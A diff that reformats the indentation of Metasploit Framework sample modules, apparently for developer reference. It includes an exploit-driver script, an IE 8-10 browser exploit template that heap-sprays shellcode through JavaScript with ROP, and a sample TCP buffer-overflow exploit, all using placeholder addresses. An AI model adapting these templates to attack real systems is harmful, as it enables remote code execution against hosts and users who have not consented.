+  # Fire it off.
+  session = exploit.exploit_simple(
+    'Payload'     => payload_name,
+    'OptionStr'   => ARGV.join(' '),
+    'LocalInput'  => input,
+    'LocalOutput' => output)

-	# If a session came back, try to interact with it.
-	if (session)
-		output.print_status("Session #{session.sid} created, interacting...")
-		output.print_line
+  # If a session came back, try to interact with it.
+  if (session)
+    output.print_status("Session #{session.sid} created, interacting...")
+    output.print_line

-		session.init_ui(input, output)
+    session.init_ui(input, output)

-		session.interact
-	else
-		output.print_line("Exploit completed, no session was created.")
-	end
+    session.interact
+  else
+    output.print_line("Exploit completed, no session was created.")
+  end

 rescue
-	output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
+  output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
 end
@@ -15,8 +15,8 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
 require 'msf/base'

 if (ARGV.length == 0)
-	puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
-	exit
+  puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
+  exit
 end

 framework    = Msf::Simple::Framework.create
@@ -26,43 +26,43 @@ input        = Rex::Ui::Text::Input::Stdio.new
 output       = Rex::Ui::Text::Output::Stdio.new

 begin
-	# Create the exploit driver instance.
-	driver = Msf::ExploitDriver.new(framework)
+  # Create the exploit driver instance.
+  driver = Msf::ExploitDriver.new(framework)

-	# Initialize the exploit driver's exploit and payload instance
-	driver.exploit = framework.exploits.create(exploit_name)
-	driver.payload = framework.payloads.create(payload_name)
+  # Initialize the exploit driver's exploit and payload instance
+  driver.exploit = framework.exploits.create(exploit_name)
+  driver.payload = framework.payloads.create(payload_name)

-	# Import options specified in VAR=VAL format from the supplied command
-	# line.
-	driver.exploit.datastore.import_options_from_s(ARGV.join(' '))
+  # Import options specified in VAR=VAL format from the supplied command
+  # line.
+  driver.exploit.datastore.import_options_from_s(ARGV.join(' '))

-	# Share the exploit's datastore with the payload.
-	driver.payload.share_datastore(driver.exploit.datastore)
+  # Share the exploit's datastore with the payload.
+  driver.payload.share_datastore(driver.exploit.datastore)

-	# Initialize the target index to what's in the exploit's data store or 
-	# zero by default.
-	driver.target_idx = (driver.exploit.datastore['TARGET'] || 0).to_i
+  # Initialize the target index to what's in the exploit's data store or 
+  # zero by default.
+  driver.target_idx = (driver.exploit.datastore['TARGET'] || 0).to_i

-	# Initialize the exploit and payload user interfaces.
-	driver.exploit.init_ui(input, output)
-	driver.payload.init_ui(input, output)
+  # Initialize the exploit and payload user interfaces.
+  driver.exploit.init_ui(input, output)
+  driver.payload.init_ui(input, output)

-	# Fire it off.
-	session = driver.run
+  # Fire it off.
+  session = driver.run

-	# If a session came back, try to interact with it.
-	if (session)
-		output.print_status("Session #{session.sid} created, interacting...")
-		output.print_line
+  # If a session came back, try to interact with it.
+  if (session)
+    output.print_status("Session #{session.sid} created, interacting...")
+    output.print_line

-		session.init_ui(input, output)
+    session.init_ui(input, output)

-		session.interact
-	else
-		output.print_line("Exploit completed, no session was created.")
-	end
+    session.interact
+  else
+    output.print_line("Exploit completed, no session was created.")
+  end

 rescue
-	output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
+  output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
 end
@@ -15,31 +15,31 @@ require 'msf/core'
 ###
 class Metasploit4 < Msf::Auxiliary

-	def initialize(info={})
-		super(update_info(info,
-			'Name'        => 'Sample Auxiliary Module',
-			'Description' => 'Sample Auxiliary Module',
-			'Author'      => ['hdm'],
-			'License'     => MSF_LICENSE,
-			'Actions'     =>
-				[
-					['Default Action'],
-					['Another Action']
-				]
-		))
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Sample Auxiliary Module',
+      'Description' => 'Sample Auxiliary Module',
+      'Author'      => ['hdm'],
+      'License'     => MSF_LICENSE,
+      'Actions'     =>
+        [
+          ['Default Action'],
+          ['Another Action']
+        ]
+    ))

-	end
+  end

-	def run
-		print_status("Running the simple auxiliary module with action #{action.name}")
-	end
+  def run
+    print_status("Running the simple auxiliary module with action #{action.name}")
+  end

-	def auxiliary_commands
-		return { "aux_extra_command" => "Run this auxiliary test commmand" }
-	end
+  def auxiliary_commands
+    return { "aux_extra_command" => "Run this auxiliary test commmand" }
+  end

-	def cmd_aux_extra_command(*args)
-		print_status("Running inside aux_extra_command()")
-	end
+  def cmd_aux_extra_command(*args)
+    print_status("Running inside aux_extra_command()")
+  end

 end
@@ -13,23 +13,23 @@
 ###
 class Metasploit4 < Msf::Encoder

-	def initialize
-		super(
-			'Name'             => 'Sample Encoder',
-			'Description'      => %q{
-				Sample encoder that just returns the block it's passed
-				when encoding occurs.
-			},
-			'License'          => MSF_LICENSE,
-			'Author'           => 'skape',
-			'Arch'             => ARCH_ALL)
-	end
+  def initialize
+    super(
+      'Name'             => 'Sample Encoder',
+      'Description'      => %q{
+        Sample encoder that just returns the block it's passed
+        when encoding occurs.
+      },
+      'License'          => MSF_LICENSE,
+      'Author'           => 'skape',
+      'Arch'             => ARCH_ALL)
+  end

-	#
-	# Returns the unmodified buffer to the caller.
-	#
-	def encode_block(state, buf)
-		buf
-	end
+  #
+  # Returns the unmodified buffer to the caller.
+  #
+  def encode_block(state, buf)
+    buf
+  end

 end
@@ -15,133 +15,133 @@ require 'msf/core'
 #
 ###
 class Metasploit4 < Msf::Exploit::Remote
-	Rank = NormalRanking
+  Rank = NormalRanking

-	include Msf::Exploit::Remote::HttpServer::HTML
-	include Msf::Exploit::RopDb
-	include Msf::Exploit::Remote::BrowserAutopwn
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::RopDb
+  include Msf::Exploit::Remote::BrowserAutopwn

-	# Set :classid and :method for ActiveX exploits. For example:
-	# :classid    => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
-	# :method     => "SetShapeNodeType",
-	autopwn_info({
-		:ua_name    => HttpClients::IE,
-		:ua_minver  => "8.0",
-		:ua_maxver  => "10.0",
-		:javascript => true,
-		:os_name    => OperatingSystems::WINDOWS,
-		:rank       => NormalRanking
-	})
+  # Set :classid and :method for ActiveX exploits. For example:
+  # :classid    => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
+  # :method     => "SetShapeNodeType",
+  autopwn_info({
+    :ua_name    => HttpClients::IE,
+    :ua_minver  => "8.0",
+    :ua_maxver  => "10.0",
+    :javascript => true,
+    :os_name    => OperatingSystems::WINDOWS,
+    :rank       => NormalRanking
+  })

-	def initialize(info={})
-		super(update_info(info,
-			'Name'           => "Module Name",
-			'Description'    => %q{
-				This template covers IE8/9/10, and uses the user-agent HTTP header to detect
-				the browser version.  Please note IE8 and newer may emulate an older IE version
-				in compatibility mode, in that case the module won't be able to detect the
-				browser correctly.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 'sinn3r' ],
-			'References'     =>
-				[
-					[ 'URL', 'http://metasploit.com' ]
-				],
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Automatic', {} ],
-					[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
-					[ 'IE 8 on Windows Vista',  { 'Rop' => :jre } ],
-					[ 'IE 8 on Windows 7',      { 'Rop' => :jre } ],
-					[ 'IE 9 on Windows 7',      { 'Rop' => :jre } ],
-					[ 'IE 10 on Windows 8',     { 'Rop' => :jre } ]
-				],
-			'Payload'        =>
-				{
-					'BadChars'        => "\x00",  # js_property_spray
-					'StackAdjustment' => -3500
-				},
-			'Privileged'     => false,
-			'DisclosureDate' => "Apr 1 2013",
-			'DefaultTarget'  => 0))
-	end
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Module Name",
+      'Description'    => %q{
+        This template covers IE8/9/10, and uses the user-agent HTTP header to detect
+        the browser version.  Please note IE8 and newer may emulate an older IE version
+        in compatibility mode, in that case the module won't be able to detect the
+        browser correctly.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'sinn3r' ],
+      'References'     =>
+        [
+          [ 'URL', 'http://metasploit.com' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+          [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
+          [ 'IE 8 on Windows Vista',  { 'Rop' => :jre } ],
+          [ 'IE 8 on Windows 7',      { 'Rop' => :jre } ],
+          [ 'IE 9 on Windows 7',      { 'Rop' => :jre } ],
+          [ 'IE 10 on Windows 8',     { 'Rop' => :jre } ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars'        => "\x00",  # js_property_spray
+          'StackAdjustment' => -3500
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 1 2013",
+      'DefaultTarget'  => 0))
+  end

-	def get_target(agent)
-		return target if target.name != 'Automatic'
+  def get_target(agent)
+    return target if target.name != 'Automatic'

-		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
-		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
+    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
+    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

-		ie_name = "IE #{ie}"
+    ie_name = "IE #{ie}"

-		case nt
-		when '5.1'
-			os_name = 'Windows XP SP3'
-		when '6.0'
-			os_name = 'Windows Vista'
-		when '6.1'
-			os_name = 'Windows 7'
-		when '6.2'
-			os_name = 'Windows 8'
-		end
+    case nt
+    when '5.1'
+      os_name = 'Windows XP SP3'
+    when '6.0'
+      os_name = 'Windows Vista'
+    when '6.1'
+      os_name = 'Windows 7'
+    when '6.2'
+      os_name = 'Windows 8'
+    end

-		targets.each do |t|
-			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
-				return t
-			end
-		end
+    targets.each do |t|
+      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
+        return t
+      end
+    end

-		nil
-	end
+    nil
+  end

-	def get_payload(t)
-		stack_pivot = "\x41\x42\x43\x44"
-		code        = payload.encoded
+  def get_payload(t)
+    stack_pivot = "\x41\x42\x43\x44"
+    code        = payload.encoded

-		case t['Rop']
-		when :msvcrt
-			print_status("Using msvcrt ROP")
-			rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
+    case t['Rop']
+    when :msvcrt
+      print_status("Using msvcrt ROP")
+      rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})

-		else
-			print_status("Using JRE ROP")
-			rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
-		end
+    else
+      print_status("Using JRE ROP")
+      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
+    end

-		rop_payload
-	end
+    rop_payload
+  end


-	def get_html(t)
-		js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
-		html = %Q|
-			<script>
-			#{js_property_spray}
+  def get_html(t)
+    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
+    html = %Q|
+      <script>
+      #{js_property_spray}

-			var s = unescape("#{js_p}");
-			sprayHeap({shellcode:s});
-			</script>
-		|
+      var s = unescape("#{js_p}");
+      sprayHeap({shellcode:s});
+      </script>
+    |

-		html.gsub(/^\t\t/, '')
-	end
+    html.gsub(/^\t\t/, '')
+  end


-	def on_request_uri(cli, request)
-		agent = request.headers['User-Agent']
-		print_status("Requesting: #{request.uri}")
+  def on_request_uri(cli, request)
+    agent = request.headers['User-Agent']
+    print_status("Requesting: #{request.uri}")

-		target = get_target(agent)
-		if target.nil?
-			print_error("Browser not supported, sending 404: #{agent}")
-			send_not_found(cli)
-			return
-		end
+    target = get_target(agent)
+    if target.nil?
+      print_error("Browser not supported, sending 404: #{agent}")
+      send_not_found(cli)
+      return
+    end

-		print_status("Target selected as: #{target.name}")
-		html = get_html(target)
-		send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
-	end
+    print_status("Target selected as: #{target.name}")
+    html = get_html(target)
+    send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
+  end
 end
@@ -15,71 +15,71 @@ require 'msf/core'
 ###
 class Metasploit4 < Msf::Exploit::Remote

-	#
-	# This exploit affects TCP servers, so we use the TCP client mixin.
-	#
-	include Exploit::Remote::Tcp
+  #
+  # This exploit affects TCP servers, so we use the TCP client mixin.
+  #
+  include Exploit::Remote::Tcp

-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Sample Exploit',
-			'Description'    => %q{
-					This exploit module illustrates how a vulnerability could be exploited
-				in an TCP server that has a parsing bug.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         => ['skape'],
-			'References'     =>
-				[
-				],
-			'Payload'        =>
-				{
-					'Space'    => 1000,
-					'BadChars' => "\x00",
-				},
-			'Targets'        =>
-				[
-					# Target 0: Windows All
-					[
-						'Windows XP/Vista/7/8',
-						{
-							'Platform' => 'win',
-							'Ret'      => 0x41424344
-						}
-					],
-				],
-			'DisclosureDate' => "Apr 1 2013",
-			'DefaultTarget'  => 0))
-	end
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Sample Exploit',
+      'Description'    => %q{
+          This exploit module illustrates how a vulnerability could be exploited
+        in an TCP server that has a parsing bug.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => ['skape'],
+      'References'     =>
+        [
+        ],
+      'Payload'        =>
+        {
+          'Space'    => 1000,
+          'BadChars' => "\x00",
+        },
+      'Targets'        =>
+        [
+          # Target 0: Windows All
+          [
+            'Windows XP/Vista/7/8',
+            {
+              'Platform' => 'win',
+              'Ret'      => 0x41424344
+            }
+          ],
+        ],
+      'DisclosureDate' => "Apr 1 2013",
+      'DefaultTarget'  => 0))
+  end

-	#
-	# The sample exploit just indicates that the remote host is always
-	# vulnerable.
-	#
-	def check
-		Exploit::CheckCode::Vulnerable
-	end
+  #
+  # The sample exploit just indicates that the remote host is always
+  # vulnerable.
+  #
+  def check
+    Exploit::CheckCode::Vulnerable
+  end

-	#
-	# The exploit method connects to the remote service and sends 1024 random bytes
-	# followed by the fake return address and then the payload.
-	#
-	def exploit
-		connect
+  #
+  # The exploit method connects to the remote service and sends 1024 random bytes
+  # followed by the fake return address and then the payload.
+  #
+  def exploit
+    connect

-		print_status("Sending #{payload.encoded.length} byte payload...")
+    print_status("Sending #{payload.encoded.length} byte payload...")

-		# Build the buffer for transmission
-		buf  = rand_text_alpha(1024)
-		buf << [ target.ret ].pack('V')
-		buf << payload.encoded
+    # Build the buffer for transmission
+    buf  = rand_text_alpha(1024)
+    buf << [ target.ret ].pack('V')
+    buf << payload.encoded

-		# Send it off
-		sock.put(buf)
-		sock.get_once
+    # Send it off
+    sock.put(buf)
+    sock.get_once

-		handler
-	end
+    handler
+  end

 end

@@ -15,20 +15,20 @@ require 'msf/core'
 ###
 class Metasploit4 < Msf::Nop

-	def initialize
-		super(
-			'Name'        => 'Sample NOP Generator',
-			'Description' => 'Sample single-byte NOP generator',
-			'License'     => MSF_LICENSE,
-			'Author'      => 'skape',
-			'Arch'        => ARCH_X86)
-	end
+  def initialize
+    super(
+      'Name'        => 'Sample NOP Generator',
+      'Description' => 'Sample single-byte NOP generator',
+      'License'     => MSF_LICENSE,
+      'Author'      => 'skape',
+      'Arch'        => ARCH_X86)
+  end

-	#
-	# Returns a string of 0x90's for the supplied length.
-	#
-	def generate_sled(length, opts)
-		"\x90" * length
-	end
+  #
+  # Returns a string of 0x90's for the supplied length.
+  #
+  def generate_sled(length, opts)
+    "\x90" * length
+  end

 end
@@ -14,21 +14,21 @@ require 'msf/core'
 ###
 module Metasploit4

-	include Msf::Payload::Single
+  include Msf::Payload::Single

-	def initialize(info = {})
-		super(update_info(info,
-			'Name'          => 'Debugger Trap',
-			'Description'   => 'Causes a debugger trap exception through int3',
-			'License'       => MSF_LICENSE,
-			'Author'        => 'skape',
-			'Platform'      => 'win',
-			'Arch'          => ARCH_X86,
-			'Payload'       =>
-				{
-					'Payload' => "\xcc"
-				}
-			))
-	end
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Debugger Trap',
+      'Description'   => 'Causes a debugger trap exception through int3',
+      'License'       => MSF_LICENSE,
+      'Author'        => 'skape',
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86,
+      'Payload'       =>
+        {
+          'Payload' => "\xcc"
+        }
+      ))
+  end

 end
--- a/Show More
+++ b/Show More